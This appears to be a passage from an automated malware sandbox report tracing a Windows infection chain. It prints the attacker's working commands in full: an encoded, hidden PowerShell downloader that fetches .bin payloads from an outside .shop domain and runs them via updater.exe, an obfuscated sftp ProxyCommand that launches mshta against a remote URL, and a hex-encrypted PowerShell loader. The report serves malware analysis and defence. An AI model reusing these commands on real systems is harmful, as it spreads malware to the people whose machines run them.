CF620D160F23D6F789F8CAA4EE9835FD65AA1D0E0278809DE0D85C1295E58C782AAFF7016B75C2FBB65FE1F73E7B038C89BAA57C32930D22EE8C71A06F4A2C738995833A10226ECDFB07ECD5F6DA31617797E009FA791AB33D9189A3A8E44428EFC9D7C6FAC3474FD38038FE910BBB036CFF902B287315F807FAAA06AED95210DDE82DAEAC0A523D871AE53C0EF75EF61B9A57F8F33A81ABD5D297C8FA835397595E7202A8E9007FFC7EDE814D001B798D89293879C641BE0707A91665E5503FECF99138AC09675DB1C070F4CF90193587A5FFC1CEE76401544370EB81704BA787C0CD04C9585C45A98FE309B624E2A8DF58992BFB2E28E05D3E083F40D7259170B815F21C934D9A6B716FB374544D200AC2F51F83FF6015BF31FAF855ACD6F94C4EDCFFE1B1B1E84CD0DCE3476BE438811875890C244AF355F5A99D60D3FE596651A7FCE949EF11B75A3E47270440D77D7293E40B99F248B7EA50AE844851B9FCECC2A42A543848822154E0BDE72E753A37ABBC37D5A523E44824FDECB7EA3DA94AE0BC489AFB57E7FF8B9D330E6B6CF749C38703F35FBB8C7524C1CC772CB6E97F52B9A303F765EEA1CF88781CF03DBAF4E05C5E83D04900C62AE76C9060D2EF02C6358A9C35D3C5CADDA4513FE8720161EE8D258C9D8738089620A44FDD02266B9393340D2A4D6DF53670CE0EAC8ADF596CBD6821F99D9AA7D32C9C1C8CDD6A112CF9684123E95FA54979737993CA2ED54A8E4E7B526955F3B82D4D1180DCF858A68E630366BAE559198412C920E3DF514DC1275386D42B0CF7D7800F9A9C56DF30AC55BB715221A65AC5F1B6C047475AF5D327C3E5F8421DC5507C9898E1CA30BC70D6ED81C7FBE88DC6473A1B361F63E277C1B83D0BA47D9D3A44BB1ED147D9E3D1391B4E0C9728E31F4600C8F8CDC7EA1BB362F215217B57B713C7F2C9B60FFBB1ABF	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -WindowStyle Hidden -EncodedCommand JABhAEoAdwA3AD0AIgB1AHAAZABhAHQAZQByAC4AZQB4AGUAIgA7ACQAawBOAHIAMwA9AC0AagBvAGkAbgAoACgANgA1AC4ALgA5ADAAKQArACgAOQA3AC4ALgAxADIAMgApAHwARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0AHsAWwBjAGgAYQByAF0AJABfAH0AfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKwAiAC4AYgBpAG4AIgA7ACQAagBYAHEANAA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQARQBNAFAAIAAtAEMAaABpAGwAZABQAGEAdABoACgALQBqAG8AaQBuACgAKAA0ADgALgAuADUANwB8AEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAB7AFsAYwBoAGEAcgBdACQAXwB9ACkAfABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAA4ACkAKQA7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAagBYAHEANAAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAA7ACQAcABIAHQANgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAYQBKAHcANwA7ACQAcwBXAGYAMgA9AEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABqAFgAcQA0ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACQAawBOAHIAMwA7ACQAdgBQAGIAOQA9ACIAaAB0AHQAcABzADoALwAvAGMAbgBkAGUAZgAxAC4AZwByAGUAZQBuAC0AcABhAHQAaAB3AGEAeQBzAC4AcwBoAG8AcAAvAGEAcABpAC8AdQB6AC8ANwA1ADUAMgA5ADcAMwA2ADUAMAAvAHUALgBiAGkAbgAiADsAJAB4AFEAZAA1AD0AIgBoAHQAdABwAHMAOgAvAC8AYwBuAGQAZQBmADEALgBnAHIAZQBlAG4ALQBwAGEAdABoAHcAYQB5AHMALgBzAGgAbwBwAC8AYQBwAGkALwB1AHoALwA3ADUANQAyADkANwAzADYANQAwAC8AbgBuAG4ALgBiAGkAbgAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAdgBQAGIAOQAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABIAHQANgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAHMAVwBmADIAOwAmACAAKABbAHMAYwByAGkAcAB0AGIAbABvAGMAawBdADoAOgBDAHIAZQBhAHQAZQAoACgAKAAnAGUAJwArACcAeABpACcAKwAnAHQAJwApACAALQBqAG8AaQBuACAAJwAnACkAKQApAA==	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\ref095vq842r70_3rd_party_authorisation_form.pdf"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\71532689\updater.exe "C:\Users\user\AppData\Local\Temp\71532689\updater.exe" C:\Users\user\AppData\Local\Temp\71532689\XPoaTdYD.bin	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\ehcfdbh\AutoIt3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Source: unknown	Process created: C:\Windows\System32\OpenSSH\sftp.exe "c:\windows\system32\openssh\sftp.exe" -o proxycommand="powershell powershell -command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]vkke]]]].mp4]]' -replace ']')" .
Source: C:\Windows\System32\OpenSSH\sftp.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" "-oforwardx11 no" "-oforwardagent no" "-opermitlocalcommand no" "-oclearallforwardings yes" -o "proxycommand=powershell powershell -command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]vkke]]]].mp4]]' -replace ']')" "-oprotocol 2" -s -- . sftp
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function wrdz($uvhg){return -split ($uvhg -replace '..', '0x$& ')};$erhgk = wrdz('eca586fb867e54d080f88ab849bfb94f298e9d4d174f6b1f2f81610c3540c56191e34fb7b2df87630478e180daca97337cf338c5f0549579e18cc1a49a1339f9691fae2edaac0d6e2ab4913030d45e7f9c40731a7b0ed45f438d15d573ab5e4816a3d8ca82daa342d630edb6e24e85f4d05e0447a728444a18214cd35db1fd5c4c677bf1eb6dd62a0d4b42a5f996d056a8c58bf2b2adc007ca0004f35eedf7db06cc47c0e8175257375360952646ddce12f86a389a2fb4f08f04df71abbd10ca19394807e45ae262b4cf2bd880666be9808038992e086339ca69f730462bd5ba268bea9591b45c3fddc4b990452c3c5b083b1d8a99db9d344be7f259679f7994fbaa4e272654402905feb107236fde83fa247f6dff5ee2de2fbe984de8d33a5077ec31d65dae7aac344db18badd0e59c3dc0a20aa1776387e75ed82f6f21e81d436d435fe7641490c8bb3be615f9d76b1f8a1323001ec29cb1dc720a20647927291abfccff409b1f94a878b0cdb0aff68e11daf8b2ccb95d3b395c11fb1d2f79673936e5f6af545b019bfde71cdac1667709524f9244c6d8b3198f1f28c92f507af233b70fd15099184e521aa3d1f4eb4613be4cc9617fd5ee373cb05a7b164a2b6211387c494f7fc2f64fb4b0eec11b39ffcc4e09ee10e96070192d4e0e2ad737b857a3ba8766ef8b454e4cc9bae60331184407821c7f5a417debb95885cd929fac64b5913d45e20ba92710c789ea36bc01ed629baaeefb8f420e9d966e4669db7e1ee213c1001073b4fb67bb454ba80b0144d096e4fa221e9ab74fb2fda2cbba9c669eb50610b810047a6a75a1e41407350666c1b141836ea4fb3c9588111ce216eb2e451248c7008ea09561e08463428a981b69214151a19dd58483cb4a07da879953aa3fdbf8ec16a79acd16fbf54b34e405fce7d15727908982c71db4ec3160579745fcbc610756535558573f49618c7606881e9c8f026001d9c1c40fd2462cc1ec3dcf620d160f23d6f789f8caa4ee9835fd65aa1d0e0278809de0d85c1295e58c782aaff7016b75c2fbb65fe1f73e7b038c89baa57c32930d22ee8c71a06f4a2c738995833a10226ecdfb07ecd5f6da31617797e009fa791ab33d9189a3a8e44428efc9d7c6fac3474fd38038fe910bbb036cff902b287315f807faaa06aed95210dde82daeac0a523d871ae53c0ef75ef61b9a57f8f33a81abd5d297c8fa835397595e7202a8e9007ffc7ede814d001b798d89293879c641be0707a91665e5503fecf99138ac09675db1c070f4cf90193587a5ffc1cee76401544370eb81704ba787c0cd04c9585c45a98fe309b624e2a8df58992bfb2e28e05d3e083f40d7259170b815f21c934d9a6b716fb374544d200ac2f51f83ff6015bf31faf855acd6f94c4edcffe1b1b1e84cd0dce3476be438811875890c244af355f5a99d60d3fe596651a7fce949ef11b75a3e47270440d77d7293e40b99f248b7ea50ae844851b9fcecc2a42a543848822154e0bde72e753a37abbc37d5a523e44824fdecb7ea3da94ae0bc489afb57e7ff8b9d330e6b6cf749c38703f35fbb8c7524c1cc772cb6e97f52b9a303f765eea1cf88781cf03dbaf4e05c5e83d04900c62ae76c9060d2ef02c6358a9c35d3c5cadda4513fe8720161ee8d258c9d8738089620a44fdd02266b9393340d2a4d6df53670ce0eac8adf596cbd6821f99d9aa7d32c9c1c8cdd6a112cf9684123e95fa54979737993ca2ed54a8e4e7b526955f3b82d4d1180dcf858a68e630366bae559198412c920e3df514dc1275386d42b0cf7d7800f9a9c56df30ac55bb715221a65ac5f1b6c047475af5d327c3e5f8421dc5507c9898e1ca30bc70d6ed81c7fbe88dc6473a1b361f63e277c1b83d0ba47d9d3a44bb1ed147d9e3d1391b4e0c9728e31f4600c8f8cdc7ea1bb362f215217b57b713c7f2c9b60ffbb1abf
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -executionpolicy remotesigned -windowstyle hidden -encodedcommand jabhaeoadwa3ad0aigb1ahaazabhahqazqbyac4azqb4aguaiga7acqaawboahiamwa9ac0aagbvagkabgaoacganga1ac4alga5adaakqaracgaoqa3ac4algaxadiamgapahwargbvahiarqbhagmaaaatae8aygbqaguaywb0ahsawwbjaggayqbyaf0ajabfah0afabhaguadaatafiayqbuagqabwbtacaalqbdag8adqbuahqaiaa4ackakwaiac4aygbpag4aiga7acqaagbyaheanaa9aeoabwbpag4alqbqageadaboacaalqbqageadaboacaajablag4adga6afqarqbnafaaiaataemaaabpagwazabqageadaboacgalqbqag8aaqbuacgakaa0adgalgauaduanwb8aeyabwbyaeuayqbjaggalqbpagiaagblagmadab7afsaywboageacgbdacqaxwb9ackafabhaguadaatafiayqbuagqabwbtacaalqbdag8adqbuahqaiaa4ackakqa7ae4azqb3ac0asqb0aguabqagac0auabhahqaaaagacqaagbyaheanaagac0asqb0aguabqbuahkacablacaarabpahiazqbjahqabwbyahkaiaataeyabwbyagmazqb8ae8adqb0ac0atgb1agwabaa7acqacabiahqanga9aeoabwbpag4alqbqageadaboacaalqbqageadaboacaajabqafgacqa0acaalqbdaggaaqbsagqauabhahqaaaagacqayqbkahcanwa7acqacwbxagyamga9aeoabwbpag4alqbqageadaboacaalqbqageadaboacaajabqafgacqa0acaalqbdaggaaqbsagqauabhahqaaaagacqaawboahiamwa7acqadgbqagiaoqa9aciaaab0ahqacabzadoalwavagmabgbkaguazgaxac4azwbyaguazqbuac0acabhahqaaab3ageaeqbzac4acwboag8acaavageacabpac8adqb6ac8anwa1aduamga5adcamwa2aduamaavahualgbiagkabgaiadsajab4afeazaa1ad0aigboahqadabwahmaogavac8aywbuagqazqbmadealgbnahiazqblag4alqbwageadaboahcayqb5ahmalgbzaggabwbwac8ayqbwagkalwb1ahoalwa3aduanqayadkanwazadyanqawac8abgbuag4algbiagkabgaiadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaalqbvahiaaqagacqadgbqagiaoqagac0atwb1ahqargbpagwazqagacqacabiahqangagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab4afeazaa1acaalqbpahuadabgagkabablacaajabzafcazgayacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7afmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabiahqangagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaakahmavwbmadiaowamacaakabbahmaywbyagkacab0agiababvagmaawbdadoaogbdahiazqbhahqazqaoacgakaanaguajwaraccaeabpaccakwanahqajwapacaalqbqag8aaqbuacaajwanackakqapaa==
Source: C:\Windows\System32\OpenSSH\sftp.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" "-oforwardx11 no" "-oforwardagent no" "-opermitlocalcommand no" "-oclearallforwardings yes" -o "proxycommand=powershell powershell -command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]vkke]]]].mp4]]' -replace ']')" "-oprotocol 2" -s -- . sftp	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -ep unrestricted -nop function wrdz($uvhg){return -split ($uvhg -replace '..', '0x$& ')};$erhgk = wrdz('eca586fb867e54d080f88ab849bfb94f298e9d4d174f6b1f2f81610c3540c56191e34fb7b2df87630478e180daca97337cf338c5f0549579e18cc1a49a1339f9691fae2edaac0d6e2ab4913030d45e7f9c40731a7b0ed45f438d15d573ab5e4816a3d8ca82daa342d630edb6e24e85f4d05e0447a728444a18214cd35db1fd5c4c677bf1eb6dd62a0d4b42a5f996d056a8c58bf2b2adc007ca0004f35eedf7db06cc47c0e8175257375360952646ddce12f86a389a2fb4f08f04df71abbd10ca19394807e45ae262b4cf2bd880666be9808038992e086339ca69f730462bd5ba268bea9591b45c3fddc4b990452c3c5b083b1d8a99db9d344be7f259679f7994fbaa4e272654402905feb107236fde83fa247f6dff5ee2de2fbe984de8d33a5077ec31d65dae7aac344db18badd0e59c3dc0a20aa1776387e75ed82f6f21e81d436d435fe7641490c8bb3be615f9d76b1f8a1323001ec29cb1dc720a20647927291abfccff409b1f94a878b0cdb0aff68e11daf8b2ccb95d3b395c11fb1d2f79673936e5f6af545b019bfde71cdac1667709524f9244c6d8b3198f1f28c92f507af233b70fd15099184e521aa3d1f4eb4613be4cc9617fd5ee373cb05a7b164a2b6211387c494f7fc2f64fb4b0eec11b39ffcc4e09ee10e96070192d4e0e2ad737b857a3ba8766ef8b454e4cc9bae60331184407821c7f5a417debb95885cd929fac64b5913d45e20ba92710c789ea36bc01ed629baaeefb8f420e9d966e4669db7e1ee213c1001073b4fb67bb454ba80b0144d096e4fa221e9ab74fb2fda2cbba9c669eb50610b810047a6a75a1e41407350666c1b141836ea4fb3c9588111ce216eb2e451248c7008ea09561e08463428a981b69214151a19dd58483cb4a07da879953aa3fdbf8ec16a79acd16fbf54b34e405fce7d15727908982c71db4ec3160579745fcbc610756535558573f49618c7606881e9c8f026001d9c1c40fd2462cc1ec3dcf620d160f23d6f789f8caa4ee9835fd65aa1d0e0278809de0d85c1295e58c782aaff7016b75c2fbb65fe1f73e7b038c89baa57c32930d22ee8c71a06f4a2c738995833a10226ecdfb07ecd5f6da31617797e009fa791ab33d9189a3a8e44428efc9d7c6fac3474fd38038fe910bbb036cff902b287315f807faaa06aed95210dde82daeac0a523d871ae53c0ef75ef61b9a57f8f33a81abd5d297c8fa835397595e7202a8e9007ffc7ede814d001b798d89293879c641be0707a91665e5503fecf99138ac09675db1c070f4cf90193587a5ffc1cee76401544370eb81704ba787c0cd04c9585c45a98fe309b624e2a8df58992bfb2e28e05d3e083f40d7259170b815f21c934d9a6b716fb374544d200ac2f51f83ff6015bf31faf855acd6f94c4edcffe1b1b1e84cd0dce3476be438811875890c244af355f5a99d60d3fe596651a7fce949ef11b75a3e47270440d77d7293e40b99f248b7ea50ae844851b9fcecc2a42a543848822154e0bde72e753a37abbc37d5a523e44824fdecb7ea3da94ae0bc489afb57e7ff8b9d330e6b6cf749c38703f35fbb8c7524c1cc772cb6e97f52b9a303f765eea1cf88781cf03dbaf4e05c5e83d04900c62ae76c9060d2ef02c6358a9c35d3c5cadda4513fe8720161ee8d258c9d8738089620a44fdd02266b9393340d2a4d6df53670ce0eac8adf596cbd6821f99d9aa7d32c9c1c8cdd6a112cf9684123e95fa54979737993ca2ed54a8e4e7b526955f3b82d4d1180dcf858a68e630366bae559198412c920e3df514dc1275386d42b0cf7d7800f9a9c56df30ac55bb715221a65ac5f1b6c047475af5d327c3e5f8421dc5507c9898e1ca30bc70d6ed81c7fbe88dc6473a1b361f63e277c1b83d0ba47d9d3a44bb1ed147d9e3d1391b4e0c9728e31f4600c8f8cdc7ea1bb362f215217b57b713c7f2c9b60ffbb1abf	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -executionpolicy remotesigned -windowstyle hidden -encodedcommand jabhaeoadwa3ad0aigb1ahaazabhahqazqbyac4azqb4aguaiga7acqaawboahiamwa9ac0aagbvagkabgaoacganga1ac4alga5adaakqaracgaoqa3ac4algaxadiamgapahwargbvahiarqbhagmaaaatae8aygbqaguaywb0ahsawwbjaggayqbyaf0ajabfah0afabhaguadaatafiayqbuagqabwbtacaalqbdag8adqbuahqaiaa4ackakwaiac4aygbpag4aiga7acqaagbyaheanaa9aeoabwbpag4alqbqageadaboacaalqbqageadaboacaajablag4adga6afqarqbnafaaiaataemaaabpagwazabqageadaboacgalqbqag8aaqbuacgakaa0adgalgauaduanwb8aeyabwbyaeuayqbjaggalqbpagiaagblagmadab7afsaywboageacgbdacqaxwb9ackafabhaguadaatafiayqbuagqabwbtacaalqbdag8adqbuahqaiaa4ackakqa7ae4azqb3ac0asqb0aguabqagac0auabhahqaaaagacqaagbyaheanaagac0asqb0aguabqbuahkacablacaarabpahiazqbjahqabwbyahkaiaataeyabwbyagmazqb8ae8adqb0ac0atgb1agwabaa7acqacabiahqanga9aeoabwbpag4alqbqageadaboacaalqbqageadaboacaajabqafgacqa0acaalqbdaggaaqbsagqauabhahqaaaagacqayqbkahcanwa7acqacwbxagyamga9aeoabwbpag4alqbqageadaboacaalqbqageadaboacaajabqafgacqa0acaalqbdaggaaqbsagqauabhahqaaaagacqaawboahiamwa7acqadgbqagiaoqa9aciaaab0ahqacabzadoalwavagmabgbkaguazgaxac4azwbyaguazqbuac0acabhahqaaab3ageaeqbzac4acwboag8acaavageacabpac8adqb6ac8anwa1aduamga5adcamwa2aduamaavahualgbiagkabgaiadsajab4afeazaa1ad0aigboahqadabwahmaogavac8aywbuagqazqbmadealgbnahiazqblag4alqbwageadaboahcayqb5ahmalgbzaggabwbwac8ayqbwagkalwb1ahoalwa3aduanqayadkanwazadyanqawac8abgbuag4algbiagkabgaiadsasqbuahyabwbragualqbxaguaygbsaguacqb1aguacwb0acaalqbvahiaaqagacqadgbqagiaoqagac0atwb1ahqargbpagwazqagacqacabiahqangagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagcaowbjag4adgbvagsazqatafcazqbiafiazqbxahuazqbzahqaiaatafuacgbpacaajab4afeazaa1acaalqbpahuadabgagkabablacaajabzafcazgayacaalqbvahmazqbcageacwbpagmauabhahiacwbpag4azwa7afmadabhahiadaatafaacgbvagmazqbzahmaiaataeyaaqbsaguauabhahqaaaagacqacabiahqangagac0aqqbyagcadqbtaguabgb0aewaaqbzahqaiaakahmavwbmadiaowamacaakabbahmaywbyagkacab0agiababvagmaawbdadoaogbdahiazqbhahqazqaoacgakaanaguajwaraccaeabpaccakwanahqajwapacaalqbqag8aaqbuacaajwanackakqapaa==	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

20_2_003688CD

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00374F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

20_2_00374F1C

Source: updater.exe, 00000014.00000003.1666482707.0000000004EBB000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 00000014.00000000.1603805988.00000000003C6000.00000002.00000001.01000000.00000010.sdmp, updater.exe, 00000014.00000002.1675167978.0000000004DE1000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: updater.exe, AutoIt3.exe	Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $eq/explorer.exe &&& Program Manager &&& [WIN]rt-eq
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002811000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Managerteiq

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0033885B cpuid

20_2_0033885B

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	20_2_016D43BD
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: GetLocaleInfoA,	20_2_016D9341
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: GetLocaleInfoA,	20_2_016D938D
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	20_2_016D44C7
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: GetLocaleInfoA,GetACP,	20_2_016DA8D9
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: GetLocaleInfoA,	20_2_016D4CE1
Source: C:\ehcfdbh\AutoIt3.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	22_2_013411F5
Source: C:\ehcfdbh\AutoIt3.exe	Code function: GetLocaleInfoA,	22_2_01346179
Source: C:\ehcfdbh\AutoIt3.exe	Code function: GetLocaleInfoA,	22_2_013461C5
Source: C:\ehcfdbh\AutoIt3.exe	Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	22_2_013412FF
Source: C:\ehcfdbh\AutoIt3.exe	Code function: GetLocaleInfoA,GetACP,	22_2_01347711
Source: C:\ehcfdbh\AutoIt3.exe	Code function: GetLocaleInfoA,	22_2_01341B19

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ehcfdbh\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ehcfdbh\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ehcfdbh\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\ehcfdbh\AutoIt3.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\ehcfdbh\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\ehcfdbh\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\ehcfdbh\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID
Source: C:\ehcfdbh\AutoIt3.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
